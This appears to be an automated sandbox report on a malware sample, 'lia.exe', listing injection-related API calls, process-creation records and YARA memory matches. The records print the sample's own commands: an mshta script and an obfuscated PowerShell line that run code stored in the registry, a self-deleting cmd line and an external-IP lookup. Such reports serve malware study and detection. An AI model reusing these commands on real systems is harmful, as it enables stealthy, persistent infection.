Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E68FC |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E9DF0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E31D4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4803E2C |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F6190 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F480C588 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F480B58C |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4808DA0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F1618 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47EA6D0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F52CC |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E12BC |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4802330 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47FFF4C |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E7F64 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4807EA0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47ECF44 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F9740 |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036C63BC |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036CA241 |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036CF1EE |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036B504A |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036C78F1 |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036BC086 |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036CCF97 |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036B9D64 |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036B95FE |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036D5430 |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036B34DC |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_0040140F NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_0040182F GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00401ABC NtMapViewOfSection, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B160A0 NtMapViewOfSection, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B15D85 GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B1231E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B18185 NtQueryVirtualMemory, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EB38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039DD317 NtMapViewOfSection, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039ECEED GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039F1AE3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D76E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039DD274 NtQueryInformationProcess, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039F29E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E2931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E7523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D696A GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D8C10 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D3F97 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E0B30 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E7EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D1641 memset,NtQueryInformationProcess, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D155B NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039F389B NtGetContextThread,RtlNtStatusToDosError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EE4D5 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00526140 NtAllocateVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00539994 NtReadVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00521B84 NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00543C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0054B58C NtSetContextThread,NtUnmapViewOfSection,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00540E70 NtMapViewOfSection, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052E614 NtCreateSection, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052FF60 RtlAllocateHeap,NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00521FBC NtWriteVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0055F003 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E1B84 NtQueryInformationProcess, |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47FAC44 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F481F003 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036BD274 NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036D1AE3 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036D29E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036C7523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036B1641 memset,NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036C7EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036B155B NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036CE4D5 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: unknown | Process created: C:\Users\user\Desktop\lia.exe "C:\Users\user\Desktop\lia.exe" |
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script> |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP" |
Source: C:\Users\user\Desktop\lia.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6AF4.bi1" |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6AF4.bi1" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\Desktop\lia.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP" |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6AF4.bi1" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6AF4.bi1" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR |
Source: Yara match | File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\lia.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\lia.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
